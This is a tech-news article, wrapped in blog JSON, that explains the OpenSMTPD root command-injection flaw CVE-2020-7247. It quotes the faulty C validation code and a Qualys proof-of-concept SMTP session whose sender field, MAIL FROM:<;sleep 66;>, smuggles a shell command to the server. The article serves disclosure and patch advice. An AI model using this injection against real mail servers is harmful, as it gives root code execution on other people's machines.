{"id":33106,"date":"2020-01-30T05:56:08","date_gmt":"2020-01-30T05:56:08","guid":{"rendered":"https:\/\/www.threatshub.org\/blog\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\/"},"modified":"2020-01-30T05:56:08","modified_gmt":"2020-01-30T05:56:08","slug":"anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\/","title":{"rendered":"Anatomy of OpenBSD’s OpenSMTPD hijack hole: How a malicious sender address can lead to remote pwnage"},"content":{"rendered":"
<\/div>\n

Code dive<\/strong> The OpenBSD project’s OpenSMTPD can be potentially hijacked by a maliciously crafted incoming email.<\/p>\n

Infosec biz Qualys discovered and this week disclosed CVE-2020-7247, a root privilege-escalation and remote code execution flaw in OpenSMTPD. It can be exploited locally by a normal user to execute shell commands as root, if using the daemon’s default configuration, or locally and remotely if the daemon is using its “uncommented” default configuration, in which it listens on all interfaces and accepts external mail. Getting root access means it’s game over: the machine is now yours.<\/p>\n

This bug is bad news for anyone running a public-facing, external-mail-accepting OpenSMTPD deployment. Check for security updates to close the hole, apply this patch<\/a>, or disable the daemon. The version shipping with OpenBSD 6.6, the latest available, and Debian testing, aka Bullseye, are vulnerable to attack; other releases may be as well. The bug dates back to May 2018.<\/p>\n

How it went wrong<\/span><\/h3>\n

After it receives an email, OpenSMTPD invokes a mail delivery agent to place the incoming message in the recipient’s inbox on the system. The delivery agent is invoked by OpenSMTPD executing a shell command, which includes the sender’s address as a command-line parameter. The sender’s address was supplied by whichever email client earlier connected to OpenSMTPD to send the message.<\/p>\n

Passing this address straight to the shell as a parameter is dangerous because hackers can exploit this to inject extra commands to be executed. To avoid this, OpenSMTPD has a string called MAILADDR_ALLOWED<\/code> that defines the non-alpha-numeric characters allowed in a valid address. In addition, the string MAILADDR_ESCAPE<\/code> contains characters that are converted to a colon character to neutralize any special characters that attempt to inject extra commands or parameters.<\/p>\n

Thus, an address is valid if it contains only alpha-numeric characters, full-stops, and anything else in MAILADDR_ALLOWED<\/code>. And anything that’s also in MAILADDR_ESCAPE<\/code> gets converted to a colon. Thus, whatever sender address is supplied by an email client, it can’t smuggle in extra commands.<\/p>\n

Unfortunately, OpenSMTPD’s sender address validation code, smtp_mailaddr()<\/code>, accidentally jumps the gun and approves dangerous sender addresses that can inject arbitrary commands into delivery agent invocations. An email address has two parts, the local part and the domain part. For corrections@theregister.co.uk<\/code>, corrections is the local part, and theregister.co.uk is the domain part. If the sender’s address has an invalid local part, and an empty domain part, smtp_mailaddr()<\/code> tries to helpfully add a default domain to the address, and then just OKs the string for use on the command line, ignoring the fact the local part is invalid.<\/p>\n

And so, if you place invalid special characters in the local part that inject commands into the command line that’s supposed to invoke the delivery agent, it’ll all sail through when it’s not supposed to.<\/p>\n

Here’s the C code at the heart of the security blunder \u2013 smtp_mailaddr()<\/code> should return the value 1 for a valid address and 0 for an invalid address when checking the address in the string pointed to by maddr<\/code>:<\/p>\n

\n2189 static int\n2190 smtp_mailaddr(struct mailaddr *maddr, char *line, int mailfrom, char **args,\n2191 const char *domain)\n2192 {\n....\n2218 if (!valid_localpart(maddr->user) ||\n2219 !valid_domainpart(maddr->domain)) {\n....\n2229 if (maddr->domain[0] == '\\0') {\n2230 (void)strlcpy(maddr->domain, domain,\n2231 sizeof(maddr->domain));\n2232 return (1);\n2233 }\n2234 return (0);\n2235 }\n2236\n2237 return (1);\n2238 }\n<\/pre>\n
“If the local part of an address is invalid (line 2218) and if its domain name is empty (line 2229), then smtp_mailaddr() adds the default domain automatically (line 2230) and returns 1 (line 2232), although it should return 0 because the local part of the address is invalid (for example, because it contains invalid characters),” the Qualys team explained in its summary<\/a>.<\/p>\n
“As a result, an attacker can pass dangerous characters that are not in MAILADDR_ALLOWED and not in MAILADDR_ESCAPE (‘;’ and ‘ ‘ in particular) to the shell that executes the [mail delivery agent] command.”<\/p>\n
Exploitation is trivial<\/span><\/h3>\n
To exploit this on your own deployment, connect to your local OpenSMTPD server using Netcat. The following interaction, provided by Qualys as a proof of concept, is just what your email client would go through with the server behind the scenes, though in this case, we’ll abuse the sender address field. Run nNetcat with:<\/p>\n
\n$ nc 127.0.0.1 25\n<\/pre>\n
And the daemon will introduce itself:<\/p>\n
\n220 obsd66.example.org ESMTP OpenSMTPD\n<\/pre>\n
Reply by saying hello to the software:<\/p>\n
\nHELO professor.falken\n<\/pre>\n
It acknowledges you:<\/p>\n
\n250 obsd66.example.org Hello professor.falken [127.0.0.1], pleased to meet you\n<\/pre>\n
Here comes the magic. Inject the command sleep 66<\/code> to make the software pause for 66 seconds, using ; to escape from the delivery agent invocation:<\/p>\n
\nMAIL FROM:<;sleep 66;>\n<\/pre>\n
And that’s it. The agent invocation command passed to the shell by OpenSMTPD will look something like \/usr\/libexec\/mail.local -f ;sleep 66;<\/code> followed by the rest of the command, which will probably fail as it’s malformed having been cut in half by the ;...;<\/code> injection sequence.<\/p>\n
All we care about is the first semicolon ending the mail.local<\/code> invocation prematurely so that our slipped-in sleep 66<\/code> runs, and the second semicolon walling off the rest of the invocation command from affecting our injected command.<\/p>\n
With that sent, the server replies:<\/p>\n
\n250 2.0.0 Ok\n<\/pre>\n
Great, it’s accepted. Play out the rest of the message delivery, such as setting the recipient and message contents:<\/p>\n
\nRCPT TO:<root>\n250 2.1.5 Destination address valid: Recipient ok\nDATA\n354 Enter mail, end with \".\" on a line by itself How about a nice game of chess?\n.\n250 2.0.0 e6330998 Message accepted for delivery\nQUIT\n221 2.0.0 Bye\n<\/pre>\n
And with that, the agent command will be run, including our injected sleep.<\/p>\n
Interestingly, Qualys said the vulnerability was thought to be much more limited when it was first found: achieving non-trivial command execution is difficult due to various restrictions in place. However, the team were inspired by the 1988 Morris worm’s abuse of the DEBUG vulnerability in Sendmail to achieve full remote-code execution.<\/p>\n
“Exploitation of the vulnerability had some limitations in terms of local part length (max 64 characters is allowed) and characters to be escaped (\u201c$\u201d, \u201c|\u201d),” said Animesh Jain, Qualys vulnerability signatures product manager.<\/p>\n
“Qualys researchers were able to overcome these limitations using a technique from the Morris Worm (one of the first computer worms distributed via the Internet, and the first to gain significant mainstream media attention) by executing the body of the mail as a shell script in Sendmail.”<\/p>\n
Admins are advised to update their software and installations as soon as possible. \u00ae<\/p>\n
Sponsored:<\/span> Detecting cyber attacks as a small to medium business<\/a><\/p>\n
READ MORE HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Function accidentally returns OK instead of no-way Code dive\u00a0 The OpenBSD project’s OpenSMTPD can be potentially hijacked by a maliciously crafted incoming email.\u2026 READ MORE HERE…<\/p>\n","protected":false},"author":2,"featured_media":33107,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[63],"tags":[],"class_list":["post-33106","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-the-register"],"yoast_head":"\nAnatomy of OpenBSD's OpenSMTPD hijack hole: How a malicious sender address can lead to remote pwnage 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Anatomy of OpenBSD's OpenSMTPD hijack hole: How a malicious sender address can lead to remote pwnage 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2020-01-30T05:56:08+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2020\/02\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"650\" \/>\n\t<meta property=\"og:image:height\" content=\"650\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Anatomy of OpenBSD’s OpenSMTPD hijack hole: How a malicious sender address can lead to remote pwnage\",\"datePublished\":\"2020-01-30T05:56:08+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\\\/\"},\"wordCount\":974,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2020\\\/02\\\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage.jpg\",\"articleSection\":[\"The Register\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\\\/\",\"name\":\"Anatomy of OpenBSD's OpenSMTPD hijack hole: How a malicious sender address can lead to remote pwnage 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2020\\\/02\\\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage.jpg\",\"datePublished\":\"2020-01-30T05:56:08+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2020\\\/02\\\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2020\\\/02\\\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage.jpg\",\"width\":650,\"height\":650},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Anatomy of OpenBSD’s OpenSMTPD hijack hole: How a malicious sender address can lead to remote pwnage\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Anatomy of OpenBSD's OpenSMTPD hijack hole: How a malicious sender address can lead to remote pwnage 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\/","og_locale":"en_US","og_type":"article","og_title":"Anatomy of OpenBSD's OpenSMTPD hijack hole: How a malicious sender address can lead to remote pwnage 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2020-01-30T05:56:08+00:00","og_image":[{"width":650,"height":650,"url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2020\/02\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage.jpg","type":"image\/jpeg"}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Anatomy of OpenBSD’s OpenSMTPD hijack hole: How a malicious sender address can lead to remote pwnage","datePublished":"2020-01-30T05:56:08+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\/"},"wordCount":974,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2020\/02\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage.jpg","articleSection":["The Register"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\/","url":"https:\/\/www.threatshub.org\/blog\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\/","name":"Anatomy of OpenBSD's OpenSMTPD hijack hole: How a malicious sender address can lead to remote pwnage 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2020\/02\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage.jpg","datePublished":"2020-01-30T05:56:08+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2020\/02\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2020\/02\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage.jpg","width":650,"height":650},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/anatomy-of-openbsds-opensmtpd-hijack-hole-how-a-malicious-sender-address-can-lead-to-remote-pwnage\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Anatomy of OpenBSD’s OpenSMTPD hijack hole: How a malicious sender address can lead to remote pwnage"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/33106","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=33106"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/33106\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/33107"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=33106"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=33106"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=33106"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}